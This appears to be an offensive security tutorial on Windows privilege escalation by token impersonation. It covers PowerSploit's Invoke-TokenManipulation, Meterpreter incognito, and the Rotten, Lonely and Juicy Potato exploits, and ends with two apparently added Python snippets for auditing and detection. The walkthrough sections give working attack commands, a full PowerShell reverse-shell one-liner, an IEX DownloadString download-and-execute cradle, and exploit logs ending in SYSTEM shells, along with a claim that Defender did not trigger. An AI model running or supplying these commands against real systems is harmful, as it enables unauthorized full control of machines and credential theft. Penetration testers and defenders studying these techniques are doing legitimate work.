Token Impersonation

Token impersonation is a technique you can use as local admin to impersonate another user logged on to a system. This is very useful when you are local admin on a machine and want to impersonate another logged-on user, e.g. a domain administrator.


We can do token impersonation directly in PowerShell with a completely legitimate module. This will spawn a new thread as the user you impersonate, but it can be made to work in the same thread. Therefore, if you impersonate and then type whoami, it might still show the original username, but you still have privileges as your target user. If you do, however, spawn a new process (or a new shell) and migrate to it, you will have a shell as the account you are impersonating.

Token impersonation is now a part of PowerSploit.

Invokes token impersonation as a domain user. If this doesn’t work you can try impersonating SYSTEM and then dumping credentials using mimikatz.

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"

Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

As a replacement for the last command you could use the following, but be wary of special characters in the command like " and ':

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('');\"};"

Rotten potato exploit

The Rotten Potato exploit is a privilege escalation technique that allows escalation from service-level accounts to SYSTEM through token impersonation. This can be achieved by uploading an exe file exploit and executing it, or through memory injection with psinject in either Empire or Metasploit. See FoxGlove Security’s writeup of the exploit for more detail.


Get a meterpreter shell as a service account and upload rot.exe to the box.

getuid – shows who you are, like whoami
getprivs – shows you available tokens for impersonation
getsystem – allows SYSTEM token impersonation directly in meterpreter if local admin
use incognito – loads an extension that allows token impersonation
list_tokens -u – lists available impersonation and delegation tokens

Now this is not very nice, but upload the exploit to disk. Now you can use meterpreter’s feature of executing binaries straight into memory, and if that doesn’t work, upload it to disk as a DLL and use rundll32 to execute it.

execute -H -c -m -d calc.exe -f /root/rot.exe
upload rot.dll "c:\temp\rot.dll"
execute -H -c -f "rundll32 c:\temp\rot.dll,Main"

Now do list_tokens -u again, and an impersonation token for SYSTEM should be available. You can then impersonate using:

impersonate_token "NT AUTHORITY\SYSTEM"

Congratulations, you are now SYSTEM.

Lonely potato

I did this on Windows 10 with Defender and nothing triggered. You could probably implement a better obfuscated reverse shell if you like.

Make a PowerShell reverse shell and put it in a file test.bat.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Upload it to the target machine at c:\windows\temp\test.bat. The directory doesn’t really matter, this is just an example.

Upload MSFRottenPotato.exe to your target machine. How you use this exploit depends on which token privileges you have, so enumerate them with:

whoami /priv

If you only have SeImpersonatePrivilege you can use the CreateProcessAsUser (t) argument. If you have both SeImpersonatePrivilege and SeAssignPrimaryToken you can use the CreateProcessWithTokenW (*) argument.
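One way to audit which accounts hold the two privileges named above, going beyond the per-session `whoami /priv` check to the machine's user-rights policy. This is an added example, not code from the original page; the sample export, the `svc_backup` account and the domain SID are constructed, and the baseline lists the Windows default holders by SID.

```python
# Audit a `secedit /export /cfg rights.inf /areas USER_RIGHTS` dump for
# unexpected holders of the privileges that potato-style escalation relies on.
# secedit writes the file as UTF-16; decode it before passing the text in.

BASELINE = {  # Windows default holders by SID; adjust to your own policy
    # LOCAL SERVICE, NETWORK SERVICE, Administrators, SERVICE
    "SeImpersonatePrivilege": {"S-1-5-19", "S-1-5-20", "S-1-5-32-544", "S-1-5-6"},
    # LOCAL SERVICE, NETWORK SERVICE
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
}

# Constructed sample; the extra holder on each line is hypothetical.
SAMPLE_INF = """[Unicode]
Unicode=yes
[Privilege Rights]
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6,svc_backup
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1111-2222-3333-1105
[Version]
signature="$CHICAGO$"
"""

def unexpected_holders(inf_text):
    """Return {privilege: [holders outside BASELINE]} from [Privilege Rights]."""
    findings, section = {}, None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "privilege rights" or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = name.strip()
        if name not in BASELINE:
            continue
        # SIDs carry a leading '*'; account names may appear without it.
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        extra = [h for h in holders if h not in BASELINE[name]]
        if extra:
            findings[name] = extra
    return findings
```

Any account reported here can be abused the same way as the service account in this walkthrough, so each one should either be justified or have the right removed.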

Set up your listener in empire, metasploit, netcat or whatever you prefer.

Execute it, for example in your ASP webshell, with:

c:\users\public\MSFRottenPotato.exe t c:\users\public\test.bat
The server's port: 80
The server's software: Microsoft-IIS/8.0
The server's software: 0 0
CreateDoc: 0 0
connect sock
start RPC connection
COM -> bytes received: 116
RPC -> bytes Sent: 116
RPC -> bytes received: 84
COM -> bytes sent: 84
COM -> bytes received: 24
RPC -> bytes Sent: 24
RPC -> bytes received: 224
COM -> bytes sent: 224
COM -> bytes received: 129
RPC -> bytes Sent: 129
RPC -> bytes received: 252
COM -> bytes sent: 252
COM -> bytes received: 158
RPC -> bytes Sent: 158
RPC -> bytes received: 56
COM -> bytes sent: 56
CoGet: -2147022986 0
[+] authresult != -1
[+] Elevated Token tye:2
[+] DuplicateTokenEx :1 0
[+] Duped Token type:1
[+] Running c:\users\public\test.bat sessionId 3
[+] CreateProcessWithTokenW OK
Auth result: 0
Return code: 0
Last error: 0

Congratulations, you are now SYSTEM; see below.

root@kali:/usr/share/webshells/asp# nc -lvp 53
listening on [any] 53 ...
inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 52773
nt authority\system

Juicy Potato

PS C:\users\public> ./jp.exe -t * -p c:\users\public\herculesshell53.exe -l 1335 -c "{4991d34b-80a1-4291-83b6-3328366b9097}"
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1335
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
PS C:\users\public>
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
connect to [] from HERCULES [] 49188

PS C:\Windows\system32> whoami
nt authority\system
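
A detection for the outcome shown in both potato runs above, added here and not part of the original page: a process running as NT AUTHORITY\SYSTEM whose parent runs as a service identity. The events are constructed and shaped like Sysmon Event ID 1 fields (Image, CommandLine, User, ParentImage, ParentUser); it assumes the parent is logged as the lower-privileged caller.

```python
SYSTEM = "NT AUTHORITY\\SYSTEM"
# Staging directories used in the walkthrough above; extend for your estate.
STAGING_DIRS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\temp\\")

# Constructed sample events (not real logs), using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c c:\\users\\public\\test.bat",
     "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": "C:\\Users\\Public\\MSFRottenPotato.exe",
     "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
    {"Image": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "ParentUser": "NT AUTHORITY\\SYSTEM"},
    {"Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "CommandLine": "w3wp.exe -ap DefaultAppPool",
     "User": "IIS APPPOOL\\DefaultAppPool",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "ParentUser": "NT AUTHORITY\\SYSTEM"},
]

def score_event(ev):
    """Return the reasons an event looks like a token-theft escalation."""
    reasons = []
    user = ev.get("User", "").upper()
    parent_user = ev.get("ParentUser", "").upper()
    # Core signal: the child is SYSTEM but the process that started it is not.
    if not (user == SYSTEM and parent_user and parent_user != SYSTEM):
        return reasons  # supporting signals only count alongside the core one
    reasons.append("SYSTEM child of non-SYSTEM parent " + ev["ParentUser"])
    paths = (ev.get("Image", ""), ev.get("ParentImage", ""))
    if any(p.lower().startswith(STAGING_DIRS) for p in paths):
        reasons.append("binary runs from a user-writable staging directory")
    if any(d in ev.get("CommandLine", "").lower() for d in STAGING_DIRS):
        reasons.append("command line references a staging directory")
    return reasons

def detect(events):
    """Return (image, reasons) for every event that has at least one reason."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["Image"], reasons))
    return hits
```

The normal direction, a SYSTEM parent such as services.exe starting a child under a service identity, is left alone; only the upward crossing is reported.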